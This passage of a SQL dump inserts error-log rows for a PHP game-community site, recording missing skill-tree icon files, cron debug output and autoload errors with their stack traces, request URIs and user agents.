b'0', 0, 203, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (282, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_weapon_halbard_01.png\' found.', 'e01364920cd7cf9898513bef8afc9651ba8c21b4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_weapon_halb...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_weapon_halb...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.016, '2014-12-13 21:42:04', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_weapon_halbard_01.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 189, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (283, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_shockwave.png\' found.', '24bc739fa63b644eed6df1b4b0c690b8b27d2a76', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_shockwa...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_shockwa...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.012, '2014-12-13 21:42:03', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_shockwave.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 189, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (284, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_savageblow.png\' found.', 'ec600cbdd4695ea33751d42e5cb7f3a2640ee100', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.016, '2014-12-13 21:42:03', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_savageblow.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 167, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (285, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n)\n', 'd10c6adef19e05e39f3b144f149285bd33123be5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 22, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 38.92129, '2014-11-27 16:33:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (286, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 23, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 38.94129, '2014-11-27 16:33:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (287, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_eviscerate.png\' found.', 'd8a9280346528a28fbc01cd15ec8a5023d9e9d8e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_e...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_e...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-12-13 21:49:50', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_eviscerate.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 162, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (288, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_warcry.png\' found.', '8e0606d1ee3a2974a4496c431e616ae81e630749', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-12-13 21:49:50', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_warcry.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 163, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (289, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_stoneclawtotem.png\' found.', 'c5c5e0042fc81dacf998bb032bf8aaf78e76f310', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_st...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_st...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-12-13 21:49:50', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_stoneclawtotem.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 162, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (290, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n)\n', 'd10c6adef19e05e39f3b144f149285bd33123be5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 26, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 38.99729, '2014-11-27 16:39:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (291, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 27, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 39.01329, '2014-11-27 16:39:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (292, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n)\n', 'd10c6adef19e05e39f3b144f149285bd33123be5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 28, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 37.85325, '2014-11-27 16:45:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (293, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 29, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 37.85725, '2014-11-27 16:45:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (294, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n [2] => 0\n)\n', 'bb33d5773831df66e23db69f358d095bb2ee985a', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 30, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 38.40927, '2014-11-27 16:48:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (295, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 31, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 38.42527, '2014-11-27 16:48:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (296, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\CRON\\SQLite3', '60d65ade06368b34c7e87ac085f03e4797d3df80', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\CRON\\\\SQL...\')\n#1 /home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php(52): spl_autoload_call(\'SYSTEM\\\\CRON\\\\SQL...\')\n#2 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#3 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#4 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#5 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#8 {main}', '37.24.148.240', 36.3892, '2014-11-27 20:22:33', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (297, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n [2] => 11\n)\n', '63734773515d52c3bb2fdc0527450cbb28858cb5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 76, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 35.18516, '2014-11-27 20:26:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (298, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 77, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 35.28917, '2014-11-27 20:26:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (299, 'SYSTEM\\LOG\\WARNING', 'Header already sent @ /home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php line 56', '21f1470aec3dd1aa4a44b7a31a49a5e3fe913b3e', 1, '/home/web/webdir/mojotrollz/system/system/HEADER.php', 9, '#0 /home/web/webdir/mojotrollz/system/system/HEADER.php(15): SYSTEM\\HEADER::checkHeader()\n#1 /home/web/webdir/mojotrollz/system/log/result/JsonResult.php(29): SYSTEM\\HEADER::JSON()\n#2 /home/web/webdir/mojotrollz/system/log/result/JsonResult.php(53): SYSTEM\\LOG\\JsonResult::toString(NULL)\n#3 /home/web/webdir/mojotrollz/system/cron/cron.php(35): SYSTEM\\LOG\\JsonResult::ok()\n#4 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#5 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#8 {main}', '37.24.148.240', 35.35717, '2014-11-27 20:26:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (300, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n [2] => 11\n)\n', '63734773515d52c3bb2fdc0527450cbb28858cb5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 67, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 36.1692, '2014-11-27 20:27:29', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (301, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 68, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 36.2292, '2014-11-27 20:27:29', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 